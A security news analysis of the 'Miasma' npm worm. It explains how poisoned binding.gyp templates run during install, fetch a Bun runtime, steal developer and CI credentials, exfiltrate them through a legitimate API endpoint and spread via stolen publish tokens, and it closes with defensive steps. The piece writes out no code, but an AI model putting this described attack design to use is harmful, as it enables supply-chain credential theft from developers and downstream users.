The 'Miasma' campaign weaponizes a build file that thousands of JavaScript projects already trust, turning a routine npm install into a credential stealing engine aimed at developer laptops, CI runners, and build pipelines.
A self-propagating npm worm has quietly infected at least 20 packages, possibly far more, by weaponizing a file the JavaScript development ecosystem already trusted: the binding.gyp build template used by native Node.js modules (The Register).
The campaign, dubbed Miasma by researchers, marks a structural step for npm supply-chain attacks. Where prior incidents leaned on typosquats, social-engineering of maintainers, or postinstall scripts that an attentive reviewer could catch, this worm moves the infection into a layer that thousands of legitimate packages already depend on. The Register's roundup, corroborated independently by Microsoft Security, JFrog, Snyk, Sonatype, Socket, and Tenable, gives the clearest picture yet of how the worm operates and why its targeting is so much broader than a single compromised maintainer.
The infection pivots on binding.gyp, a JSON-like build configuration that node-gyp consumes to compile native C++ add-ons. Snyk's teardown shows the poisoned template embeds shell code that runs during npm install and pulls down a self-contained Bun runtime binary, bun-v1.3.13, straight from the legitimate oven-sh/bun GitHub releases (Snyk). Bun is real, fast, and not flagged by antivirus tooling the way a stranger binary might be. Once running, the worm uses Bun to harvest secrets from the host: GitHub classic tokens, fine-grained personal access tokens (github_pat_), npm publishing tokens (npm_), GitHub Actions JWTs (ghs_*), SSH keys, cloud credentials, CI/CD environment variables, package registry tokens, shell history, IDE config files, and configuration from AI-coding assistants.
Exfiltration runs through a clever abuse of legitimate infrastructure. Rather than standing up its own server, the worm ships stolen credentials back through api.anthropic.com/v1/api, a real Anthropic endpoint used as camouflage (The Register). The exfil traffic looks like ordinary API calls to anyone scanning outbound logs. Researchers have also surfaced a destructive tripwire string: any attempt to revoke one of the stolen tokens appears to trigger a payload keyed to IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner, which researchers read as a threat to wipe the original owner's machine. A second marker, the phrase 'Miasma: The Spreading Blight,' appears in repository descriptions and dead-drop commits.
The June 24 wave hit the LeoPlatform and RStreams ecosystems. Confirmed victims include @vapi-ai/server-sdk (about 86,500 weekly downloads), ai-sdk-ollama (about 36,900), autotel (about 5,900), and awaitly (about 280) (Socket). Each high-download victim is a foothold: every developer's npm install becomes a credential exfiltration event on their laptop, on CI runners, or inside container build pipelines that often hold production deploy keys. Sonatype, which tracks npm package risk continuously, has added hexo-deployer-wrangler@1.0.4, hexo-shoka-swiper@0.1.10, and prism-silq@1.0.1 to its confirmed-malicious list beyond the early reports (Sonatype). The same firm has, importantly, walked back earlier suspicions on three LeoPlatform packages, leo-connector-common@4.0.11-rc, leo-connector-postgres@4.0.19-beta, and leo-connector-entity-table@3.0.22-rc, which it now judges likely not malicious.
The June wave is not the worm's first run. In early June, a separate infection hit @redhat-cloud-services/* npm packages, and Microsoft's writeup treats that episode as a dry run for the same author tradecraft (Microsoft Security Blog). JFrog's analysis shows how the worm uses GitHub as its propagation substrate: every harvested token with publish rights becomes a vector for new malicious package versions, and the attacker account liuende501 now hosts 321 public repositories in the <adjective>-<noun>-<number> pattern the worm generates (JFrog). Snyk tallies roughly 57 packages compromised across the worm's lifetime; the count differs from The Register's '20-plus' because the snapshots were taken at different moments.
The structural shift matters more than any single victim. Pre-Miasma, npm supply-chain compromises leaned on tricking a maintainer or waiting for someone to npm install a typosquatted name. The binding.gyp pivot moves the attacker into the build layer that legitimate native modules already require. Tenable's writeup frames it bluntly: the underground has absorbed the lesson that npm is an easy target, and tooling that automates propagation across maintainer accounts makes each successful compromise a self-funding source of the next one (Tenable). npm's trust model, where anyone can publish a package and thousands of downstream projects pull it in via npm install without further review, is what makes the worm cheap to run and what keeps making this kind of attack affordable for the next operator.
For developers, the immediate work is unglamorous: pin and lockfile dependencies, audit postinstall and node-gyp runs in CI, isolate CI credentials with short-lived OIDC tokens rather than long-lived secrets, rotate any token, key, or cloud credential that may have lived on a developer laptop or build runner in the affected window, and watch for typosquats or sudden new publishers on packages you already depend on. The next trigger to watch is whether the attacker rotates off liuende501 and the Bun-binary delivery chain once defenders fingerprint it, a familiar pattern in self-propagating supply-chain worms and the one that will tell defenders whether this is a campaign or a template.